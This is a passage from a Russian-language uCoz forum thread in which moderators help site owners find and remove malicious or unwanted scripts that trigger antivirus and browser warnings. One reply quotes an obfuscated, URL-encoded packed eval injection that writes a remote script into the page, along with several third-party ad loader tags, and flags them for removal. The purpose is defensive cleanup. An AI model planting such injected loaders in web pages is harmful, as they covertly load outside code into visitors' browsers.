Модератор форума: Yuri_G  
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте


  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    ohranatruda
    Сообщений: 5
    Репутация: 0

    Сообщение # 901 | 14:05:19
    Поиск спровацировал Аваст, заблокировавший доступ на сайт.
    Спасибо! Уберу эту гадость может и правда столько рекламы это лишнее.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 902 | 14:10:31
    ohranatruda, с этого и надо было начинать. про аваст. в правилах подачи заявки написано что делать и онлайн сервисов там нет
    удалите в первую очередь тизернет. на него в последнее время реагирует именно аваст

    Код
    <script type="text/javascript" src="http://samiana.com/53h/473745eb005"></script>


    вот это http://otipb.at.ua/107/3/7332257334.js стоит тут

    Код
    <script type="text/javascript" src="http://otipb.at.ua/rtr/1"></script>

    и вот это

    Код
    <script language="JavaScript" type="text/JavaScript">j="%3Cscript%20language%3D%22JavaScript%22%20type%3D%22text%2FJavaScript%22%20charset%3D%22windows-1251%22%3Eeval%28function%28p  %2Ca%2Cc%2Ck%2Ce%2Cd%29%7Be%3Dfunction%28c%29%7Breturn%20c.toString%2836%29%7D%3Bif%28%21%27%27.replace%28%2F%5E%2F%2CString%29%29%7Bwhile%2  8c--%29%7Bd%5Bc.toString%28a%29%5D%3Dk%5Bc%5D%7C%7Cc.toString%28a%29%7Dk%3D%5Bfunction%28e%29%7Breturn%20d%5Be%5D%7D%5D%3Be%3Dfunction%28%29  %7Breturn%27%5C%5Cw%2B%27%7D%3Bc%3D1%7D%3Bwhile%28c--%29%7Bif%28k%5Bc%5D%29%7Bp%3Dp.replace%28new%20RegExp%28%27%5C%5Cb%27%2Be%28c%29%2B%27%  5C%5Cb%27%2C%27g%27%29%2Ck%5Bc%5D%29%7D%7Dreturn%20p%7D%28%279.8%28%22%3Ca%22%2B%22b%22%2B%22%3Ec%22%2B%22%3D7%3B6%3D%5C%5C%222%5C%5C%22%3B%  3C%5C%5C%2F0%3E%3C1%22%2B%223%204%3D%5C%5C%225%5C%5C%22%20d%22%2B%22r%3D%5C%5C%22e%2Fn%22%2B%22m%5C%5C%22%20o%22%2B%22p%3D%5C%5C%22q-l%5C%5C  %22%20k%3D%5C%5C%22g%3A%2F%2Ff.h%2Fi.j%5C%5C%22%3E%3C%5C%5C%2F0%3E%22%29%3B%27%2C28%2C28%2C%27script%7Cscr%7C32257%7Cipt%7Clanguage%7CJavaSc  ript%7Ctm%7C797%7Cwrite%7Cdocument%7Csc%7Cript%7Cizs%7Cty%7Ctext%7Ctwitep%7Chttp%7Ccom%7Cj35%7Cphp%7Csrc%7C1251%7CaScript%7CJav%7Cchars%7Cet  %7Cwindows%7Cpe%27.split%28%27%7C%27%29%2C0%2C%7B%7D%29%29%0A%3C%2Fscript%3E";j=j.replace(/с/g,"2C");j=j.replace(/т/g,"7C");j=j.replace(/у/g,"5C");document.write(unescape(j));</script>
    <!-- блок рекламы от kadam тчк ru основной код -->
       <noindex><script type="text/javascript">
    (function() {
    var kdm = document.createElement('script'); kdm.type = "text/javascript"; kdm.async = true;
    kdm.src = "http://vogosita.com/78d1e5f5880824e208cf1e1f3b61f2cf.js";
    var s = document.getElementsByTagName('script')[0];
    s.parentNode.insertBefore(kdm, s);
    };));
    </script>
    убрать в обязательном порядке

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    ohranatruda
    Сообщений: 5
    Репутация: 0

    Сообщение # 903 | 23:29:22
    Вроде убраны все бока. Результат "0"
    Все равно аваст орет , эти http://sitecheck.sucuri.net/scanner/ тычут сюда http://otipb.at.ua/load/9 и пишут здесь вирус :
    Код
    <script type="text/javascript">new Image().src = "http://counter.yadro.ru/hit;counter2?r"+escape(document.referrer)+((typeof(screen)=="undefined")?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";"+Math.random();</script></div><script
    type="text/javascript">
    var m_up = [
    ['s',"94367"],
    ];
    document.write('<scr'+'ipt type="text/javascript"
    src="http://cache.betweendigital.com/code/mobile.js"></scr'+'ipt>');
    </script>


    Капец. :-(
    Сообщение отредактировал ohranatruda - Пятница, 03 Янв 2014, 23:30:34
    Mars7972
    Сообщений: 8
    Репутация: 0

    Сообщение # 904 | 12:59:55
    У меня на сайте с 01.01.2014 на какую кнопку не нажми для перехода, сразу всплывает на все окно реклама игры Казино ИКС или Джек Пот игровая система.)))
    И ссылка http://777mister.com/landing...._777pop

    Почему такое происходит)
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 905 | 13:07:01
    Mars7972, где адрес проблемного сайта? правила подачи заявки пытались читать?

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    сondor
    Сообщений: 4661
    Репутация: 1528

    Сообщение # 906 | 13:10:43
    Цитата ohranatruda ()
    Все равно аваст орет , эти http://sitecheck.sucuri.net/scanner/ тычут сюда http://otipb.at.ua/load/9 и пишут здесь вирус :


    Не пользуйтесь проверялками онлайн для нахождения вирусов. На что именно ругается аваст, на этот же код?

    Цитата Mars7972 ()
    У меня на сайте с 01.01.2014 на какую кнопку не нажми для перехода, сразу всплывает на все окно реклама игры Казино ИКС или Джек Пот игровая система.)))


    Mars7972, ссылка на проблемный сайт где?
    ohranatruda
    Сообщений: 5
    Репутация: 0

    Сообщение # 907 | 15:48:57
    Да на тот же код
    Код
    <script type="text/javascript">new Image().src =
    "http://counter.yadro.ru/hit;counter2?r"+escape(document.referrer)+((typeof(screen)=="undefined")?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";"+Math.random();</script></div><script

    type="text/javascript">
    var m_up = [
    ['s',"94367"],
    ];
    document.write('<scr'+'ipt type="text/javascript"
    src="http://cache.betweendigital.com/code/mobile.js"></scr'+'ipt>');
    </script>


    А вот эта часть betweendigital.com какя то партнерка, которой я никогда не пользовался.
    Сообщение отредактировал ohranatruda - Суббота, 04 Янв 2014, 15:50:23
    сondor
    Сообщений: 4661
    Репутация: 1528

    Сообщение # 908 | 16:30:06
    ohranatruda, никакого вредоносного действия вот этот код:

    Цитата
    <script type="text/javascript">new Image().src =
    "http://counter.yadro.ru/hit;counter2?r"+escape(document.referrer)+((typeof(screen)=="undefined")?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";"+Math.random();</script>


    не оказывает, это код статистики и аваст принимает его за вредоносный по ошибке. Свяжитесь со специалистами технической службы аваста и проясните ситуацию.

    Что касается вот этого кода:

    Цитата
    <script type="text/javascript">
    var m_up = [
    ['s',"94367"],
    ];
    document.write('<scr'+'ipt type="text/javascript"
    src="http://cache.betweendigital.com/code/mobile.js"></scr'+'ipt>');
    </script>


    то не удалось у вас его обнаружить вообще wacko
    Mars7972
    Сообщений: 8
    Репутация: 0

    Сообщение # 909 | 16:39:05
    Ой извините...вот мой сайт http://boutikchocolate.ucoz.ru/
    сondor
    Сообщений: 4661
    Репутация: 1528

    Сообщение # 910 | 16:47:50
    Mars7972, для начала удаляем вот это и не ставим с этого сайта прочую грязь:

    Цитата
    <script language="JavaScript" src="http://101widgets.com/16040001/140/259"></script>


    также вот эту каку в блоке визитер тоже лучше убрать:

    Цитата
    <script type="text/javascript" src="http://feedjit.com/serve/?vv=1013&tft=3&dd=0&wid=a96ede9a2ae5bbe3&pid=0&proid=0&bc=4D4542&tc=FFFFFF&brd1=949494&lnk=EBCACA&hc=FFFFFF&hfc=612F04&btn=422011&ww=180&wne=8&wh=Live+Traffic+Feed&hl=0&hlnks=0&hfce=0&srefs=1&hbars=0"></script>
    sergey404
    Сообщений: 19
    Репутация: 8

    Сообщение # 911 | 00:33:17
    Всем здравствуйте! столкнулся с проблемкой...
    случайно обнаружил у себя на сайте вот такой скрипт



    и почему то только на вот этой странице http://kino-vek.ucoz.ru/load/uzhasy/4-5-2
    гугл хром выдает предупреждение:



    но я точно знаю что не устанавливал данный скрипт себе на сайт...
    подскажите где его искать??? я уже все перелопатил, ну немогу найти и все тут angry

    Сообщение отредактировал sergey404 - Воскресенье, 05 Янв 2014, 00:34:33
    $Vladimir$
    Сообщений: 7465
    Репутация: 1053

    Сообщение # 912 | 11:57:49
    sergey404, скрипт стоит перед закрывающимся тегом body, удалите его из шаблона "Страница со списком материалов и категории"
    sergey404
    Сообщений: 19
    Репутация: 8

    Сообщение # 913 | 12:52:40
    Цитата $Vladimir$ ()
    sergey404, скрипт стоит перед закрывающимся тегом body, удалите его из шаблона "Страница со списком материалов и категории"
    СПасибо большое!!! xmas

    Mars7972
    Сообщений: 8
    Репутация: 0

    Сообщение # 914 | 19:47:32
    сondor, спасибо большое! Все поняла и убрала! С праздником! xmas
    akula-z
    Сообщений: 214
    Репутация: 43

    Сообщение # 915 | 21:10:52
    До этого писала в другую тему форума, но сейчас пишу сюда, ибо не знаю, куда еще можно написать?
    У меня на двух сайтах, на этом и этом, когда заходишь на сам сайт и нажимаешь на любом месте, открывается в новом окне реклама каких-то интернет-магазинов, а именно, Розетки или Мобилак. Скажите, это реклама от юкоз или какие-то вирусы на сайте?
    Появилось это где-то с неделю назад.
    Поиск: